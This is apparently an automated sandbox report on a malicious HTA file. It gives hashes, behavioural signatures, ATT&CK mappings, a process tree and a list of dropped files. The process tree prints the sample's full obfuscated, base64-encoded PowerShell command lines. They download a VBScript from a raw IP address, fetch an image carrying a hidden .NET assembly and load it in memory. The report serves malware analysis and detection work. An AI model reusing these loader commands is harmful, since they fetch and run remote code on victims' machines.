8681e7cda9d182dc17e7fae70fde1eb13376b027190c34067dbdf6ce75345985

General

Target

goodofrmybestthingstogiveubestofthingsgood.hta
Size

14KB
MD5

d971c9a913293c3ba364138f8d331654
SHA1

1f9ea3c21fcc01fd72ddf75dab0ad971a4ad9ee4
SHA256

8681e7cda9d182dc17e7fae70fde1eb13376b027190c34067dbdf6ce75345985
SHA512

b13892d5b800f1d366c96d14918e04582a4e04e915ca02c7fd6cdbb879f3f3a1fea91cf96e183f7887c761a1dfc6a6300755f61caa0e630435a3d61d85acc9e3
SSDEEP

48:3TTyx915hfpi04Tyx915hGpi0V4zifG99DdsEwYKTcDQEnTyx915htTyx915hUdE:fgdpCgwp8ziufqEwYK4Tg3g+pPg5

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2112	powershell.exe
6	2884	powershell.exe
7	2884	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2112	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2884	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2112	powershell.exe
2884	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2424 wrote to memory of 3028	2424	mshta.exe	31
PID 2424 wrote to memory of 3028	2424	mshta.exe	31
PID 2424 wrote to memory of 3028	2424	mshta.exe	31
PID 2424 wrote to memory of 3028	2424	mshta.exe	31
PID 3028 wrote to memory of 2112	3028	cmd.exe	33
PID 3028 wrote to memory of 2112	3028	cmd.exe	33
PID 3028 wrote to memory of 2112	3028	cmd.exe	33
PID 3028 wrote to memory of 2112	3028	cmd.exe	33
PID 2112 wrote to memory of 2836	2112	powershell.exe	34
PID 2112 wrote to memory of 2836	2112	powershell.exe	34
PID 2112 wrote to memory of 2836	2112	powershell.exe	34
PID 2112 wrote to memory of 2836	2112	powershell.exe	34
PID 2836 wrote to memory of 2968	2836	csc.exe	35
PID 2836 wrote to memory of 2968	2836	csc.exe	35
PID 2836 wrote to memory of 2968	2836	csc.exe	35
PID 2836 wrote to memory of 2968	2836	csc.exe	35
PID 2112 wrote to memory of 2616	2112	powershell.exe	37
PID 2112 wrote to memory of 2616	2112	powershell.exe	37
PID 2112 wrote to memory of 2616	2112	powershell.exe	37
PID 2112 wrote to memory of 2616	2112	powershell.exe	37
PID 2616 wrote to memory of 2884	2616	WScript.exe	38
PID 2616 wrote to memory of 2884	2616	WScript.exe	38
PID 2616 wrote to memory of 2884	2616	WScript.exe	38
PID 2616 wrote to memory of 2884	2616	WScript.exe	38

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\goodofrmybestthingstogiveubestofthingsgood.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2424
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C poWErsHElL -EX BYpAss -nOp -W 1 -C DevICEcrEdENtIAlDEpLOYMEnt ; iEx($(iex('[SyStEm.TExt.ENCodING]'+[CHar]0x3A+[chaR]58+'Utf8.geTStrinG([sYstem.cOnVerT]'+[cHAr]0X3A+[cHaR]58+'FRomBAsE64StRiNG('+[char]0X22+'JGtUOHphTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CZXJkZWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1vbi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIRlpzY2xZaE1zLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHljUVNQcXcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVZxQlNzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5enEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmYUxMYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRVNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGtUOHphTDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzU0LjM3LjEzMS4yNDAvMTE0L2dvb2RvZnJteWJlc3R0aGluZ3N0b2dpdmV1YmVzdG9mdGhpbmdzZ29vZC5nSUYiLCIkZW52OkFQUERBVEFcZ29vZG9mcm15YmVzdHRoaW5nc3RvZ2l2ZXViZXN0b2Z0aGluZ3Nnb28udmJzIiwwLDApO1N0QVJ0LVNMRUVwKDMpO0lOdk9rRS1pdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxnb29kb2ZybXliZXN0dGhpbmdzdG9naXZldWJlc3RvZnRoaW5nc2dvby52YnMi'+[CHAr]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3028
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poWErsHElL -EX BYpAss -nOp -W 1 -C DevICEcrEdENtIAlDEpLOYMEnt ; iEx($(iex('[SyStEm.TExt.ENCodING]'+[CHar]0x3A+[chaR]58+'Utf8.geTStrinG([sYstem.cOnVerT]'+[cHAr]0X3A+[cHaR]58+'FRomBAsE64StRiNG('+[char]0X22+'JGtUOHphTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CZXJkZWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1vbi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIRlpzY2xZaE1zLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHljUVNQcXcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVZxQlNzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5enEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmYUxMYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRVNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGtUOHphTDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzU0LjM3LjEzMS4yNDAvMTE0L2dvb2RvZnJteWJlc3R0aGluZ3N0b2dpdmV1YmVzdG9mdGhpbmdzZ29vZC5nSUYiLCIkZW52OkFQUERBVEFcZ29vZG9mcm15YmVzdHRoaW5nc3RvZ2l2ZXViZXN0b2Z0aGluZ3Nnb28udmJzIiwwLDApO1N0QVJ0LVNMRUVwKDMpO0lOdk9rRS1pdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxnb29kb2ZybXliZXN0dGhpbmdzdG9naXZldWJlc3RvZnRoaW5nc2dvby52YnMi'+[CHAr]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2112
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7k-asf4r.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2836
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD5E6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD5E5.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2968
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodofrmybestthingstogiveubestofthingsgoo.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2616
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAG8AZwBzAGcAbgBpAGgAdABmAG8AdABzAGUAYgB1AGUAdgBpAGcAbwB0AHMAZwBuAGkAaAB0AHQAcwBlAGIAeQBtAHIAZgBvAGQAbwBvAGcALwA0ADEAMQAvADAANAAyAC4AMQAzADEALgA3ADMALgA0ADUALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMQAwADAAOAAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AagB6AHcARQBIAEEASgBQAHgASwBMAEwAegBnAFoARgBoAFkAVgBBAFEATQBBAE8ARQBOAEgAMQBRAHcAdgA4AGEAcwBFAG4ANAAzAHIATgBIADgAdwBPAGcAcQB4AGcATABOADUAeQBnAGcARQBLAGgAOQBFAGcAQQA5ADcARwBnAGMATABYAFEAZwAmAHAAawBfAHYAaQBkAD0AMwA0ADIAOAAwADMAZAAxAGMAYwA0AGUAMwBiADgAMAAxADcAMwA4ADgAOAAyADQAOQA1AGIANQBmAGUAOQBkACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7k-asf4r.dll

Filesize
3KB

MD5
d0eb98a8dd9643739be1351c274862d1

SHA1
fa5f0fb261c78f948584e3a539974b71b3423cda

SHA256
71406db7f770b27f05f79611b0ca0ab1746a470d13c35611e74f2c0abee4563a

SHA512
675e1cd0eb6e2c422e886277b2e3b1f1717e2741c1388fe066bcfeaf0676e151130922f0eaeccb56aeecb59195c7d1727c4b5142064d52952c808d82f128f1b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7k-asf4r.pdb

Filesize
7KB

MD5
97aab66dc3ecf3ecc7af7a90e1caaef3

SHA1
59eff5c8134ff945de63861422a722e23a042558

SHA256
3c17d45e166edb8e8dc1ca3036b927589a891f8c4b8ed776500f9187b52cf2f8

SHA512
4c492656d35284b9e428621d95ac583555f147d56c2caf5c27b94d672f08a8a7dc7c9acca5f9b58ab9312adbe30384471baa3d4af46a7d0665b044a57c48a7cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD5E6.tmp

Filesize
1KB

MD5
1e8f20d1fb5b0eb0cd732d4c5e0e2734

SHA1
6a9d664530957d8d9f75b4e0a45d1ee562708e5b

SHA256
1b19be3d8ae6596e633ddd252b764ce35b53739b85d39c75d1b959eaa243145c

SHA512
b84532d4959d9c64d055908daed7eeee413d66065bcf19c73114b721dd72bc1092b73a40cdb9b535cef2aad2aca8327ba785be93daa2eb87ed1bf2dc6b7a1dcd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c1e165ff672598b4bac9779bd6f01543

SHA1
c1e1fda97e4e2bfbe0004863aea8652142ca9df3

SHA256
514147ace200dec426bf3b9324aedb08c8d60cafd8b9fc55cf155505f15b9bc9

SHA512
88c9b14fb1fedd0c5251897488b39b6cb29f8b4eb89bab727bee2fdf128dc526caf85d00699a370ce49636396106454435797fdba2f3cbd0bf6675737c179579

Download Submit
C:\Users\Admin\AppData\Roaming\goodofrmybestthingstogiveubestofthingsgoo.vbs

Filesize
202KB

MD5
3023f9829200c7185da1975e3e2be6e7

SHA1
ff499cdaa1c862f3e1103bc37ac2a4ca387c1aa1

SHA256
d3fe56f9f749be21644a978011b1dbc4175f9be3091ed881aacf981afb40944a

SHA512
77b978a75cf2ee24574ed02509346e81355be471f6054288946e8aca3639582af06053e6a0340c0cd6028cc894282ce2be32731719d67c47397aed68e9c6596c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\7k-asf4r.0.cs

Filesize
472B

MD5
9a5de27bd2823c1914cc224bd0255a24

SHA1
e0997163b8c055bbdcea2ee92010cb701d69ead5

SHA256
5f131f7f50dfd4bece756bfa64f0f395c8c0d29e86ef47a501e90a341a882d17

SHA512
ed90e6cb6ed8655b2973e90cb72fc5d795e263de770db5c50273dc18b6a82e801b78cc1d68934be601c93af3b5ef80ad4fff52579f01ba3abd9dcbd83eb7ac99

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\7k-asf4r.cmdline

Filesize
309B

MD5
2e10ce34cdcdb345b4de61b0c1a8530c

SHA1
bc5a6d978021eb1bec2cd58a234b28319efdcef3

SHA256
c9a5f5d3158fabdf8a5137feb466af67421a13678a782d182d675e04d9f2df24

SHA512
2b50917034f0efccdee7d8b447ba8954554758206c54cfb555364b8b79ce3d7eb63c605d91c83e36eafccb0488cab3a49453fa4a9e4c66b5ea3121338f592306

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCD5E5.tmp

Filesize
652B

MD5
819dd0340ab5baeafd7af95963ba2d06

SHA1
a8866fabc91563adfb786842818bc8024085b07b

SHA256
3c3384b8964f109629e576963c6be6d0bdc3408fdd219b6969e27e64ef858c7a

SHA512
e844ab3b668339047656f51fd2701132a73152c0ae650fd86a53b237a9006a935f2da0e0fedbecc6c52a4b2097581a0bd66add32bb99912bde36edd62df5817d

Download Submit

Analysis

Sharing